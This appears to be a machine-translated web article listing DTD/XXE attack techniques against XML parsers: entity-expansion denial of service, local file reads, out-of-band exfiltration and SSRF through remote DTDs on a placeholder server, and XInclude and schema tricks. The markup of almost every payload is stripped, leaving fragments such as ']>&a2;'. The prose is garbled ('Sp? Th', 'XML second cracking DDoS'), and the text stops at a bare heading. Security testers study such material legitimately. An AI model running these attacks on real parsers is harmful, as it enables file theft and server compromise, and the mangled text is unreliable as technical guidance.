Analysis of Different Types of DTD/XXE attacks

Analysis of Different Types of DTD/XXE attacks

 

 

When evaluating the security of XML-based services, you cannot forget the DTD-based attacks, such as XML external entity injection attacks (XXE ).

In this article, we will provide a comprehensive list of attacks against different types of DTD.

Attacks are classified as follows:

Denial of Service Attack (DDoS)

Basic XXE attacks

Advanced XXE attacks

Server Request Forgery (SSRF)

XML inclusion mechanism (XInclude)

Extended style sheet conversion language (XSLT)

Denial of Service (DDoS) supports entity testing:

  
  
  ]>&a2;
  
  
  

If the parsing process changes very slowly, the test is successful, that is, the target parser configuration may be vulnerable to at least one DDoS attack.

Billion Laughs attack (Klein, 2002)

Note: "Billion Laughs" attack-generate a Billion "Ha!" In memory by creating a recursive XML definition !" String, resulting in DDoS attacks. The principle is: Construct malicious XML entity files to exhaust available memory, because many XML Parser tends to keep its entire structure in memory when parsing XML documents.

  
  
  
  ]>&a4;
  
  
  
  

This file is only 30 Kb in size, but has 11111 entity references, which exceeds the maximum number of valid entity references.

Source

Billion Laughs attack-parameter entity (Sp? Th, 2015)

]>&g;

File located: http://publicServer.com/dos.dtd

XML second cracking DDoS Attack

&a0;&a0;...&a0;

Source

General entity Recursion

It is best not to use Recursion-[WFC: No Recursion]

  ]>&a;
  

External entity (Steuck, 2002)

This attack is performed by declaring an external entity and then referencing a large file (for example, C:/pagefile. sys or/dev/random) located online or locally ).

However, this attack only allows the parser to parseHuge XML file.

]>&dos;

Source

Basic XXE attacks (Steuck, 2002)

  ]>&file;
  

Take the file '/sys/power/image_size' as an example, because it is very short and has only one line and does not contain special characters.

This type of attack requires a direct feedback channel and the access to files is restricted by prohibited characters in XML, such as "<" and "&".

If these banned characters appear in the file to be accessed (for example,/etc/fstab), the XML Parser throws an error and stops parsing.

Source

XXE attack using netdoc

  ]>&file;
  

Source: @ Nirgoldshlager

Advanced XXE attack-direct feedback channel

These attacks are advanced XXE attacks used to bypass restrictions on basic XXE attacks and OOB (out-of-band data) attacks.

Attackers can bypass the limitations of XXE attacks (Morgan, 2014)

  
  
  
  %dtd;]>&all;
  
  
  
  

File located: http://publicServer.com/parameterEntity_core.dtd

Source

XXE attacks that abuse attribute values

%remote;]>

File located: http://publicServer.com/external_entity_attribute.dtd

  
  %param1;
  
  

Source

Advanced XXE attack-OOB data (OOB) Channel

There is no channel for direct return, which does not mean there is no XXE attack.

Xxe oob attack (Yunusov, 2013)

&send;

File located: http://publicServer.com/parameterEntity_oob.dtd

  
  %all;
  
  

Source

Xxe oob attack-parameter entity (Yunusov, 2013)

The difference is that only parameter entities are used.

%remote;%send;]>4

File located: http://publicServer.com/parameterEntity_sendhttp.dtd

  
  %param1;
  
  

Source

Xxe oob attack-parameter entity FTP (Novikov, 2014)

Using the FTP protocol, attackers can read files of any length.

%remote;%send;]>4

File located: http://publicServer.com/parameterEntity_sendftp.dtd

  
  %param1;
  
  

For this attack, you need to configure the FTP server. However, this POC code can be used on any parser with slight adjustments.

Source

SchemaEntity attack (Sp? Th, 2015)

There are three different attack methods: (I) schemaLocation, (ii) noNamespaceSchemaLocation, and (iii) XInclude.

SchemaLocation

%remote; ]>
  
   4
  

NoNamespaceSchemaLocation

%remote; ]>

XInclude

%remote; ]>
   

File located: http://publicServer.com/external_entity_attribute.dtd

  
  %param1;
  
  

SSRF attack DOCTYPE

]>4

External entity (Steuck, 2002)

  ]>&remote;
  

Although it is best to reference a well-formed XML file (or any text file) to avoid errors, some Resolvers may still call files with incorrect URL reference formats.

Source

External parameter entity (Yunusov, 2013)

  %remote; ]>4
  

File located: http://publicServer.com/url_invocation_parameterEntity.dtd

Source

XInclude

File located: http://publicServer.com/file.xml

it_works

SchemaLocation

  
   4
  

File located: http://publicServer.com/url_invocation_schemaLocation.xsd

Or use this file.

NoNamespaceSchemaLocation

4

File located: http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd

XInclude attack (Morgan, 2014)

Source

XSLT attacks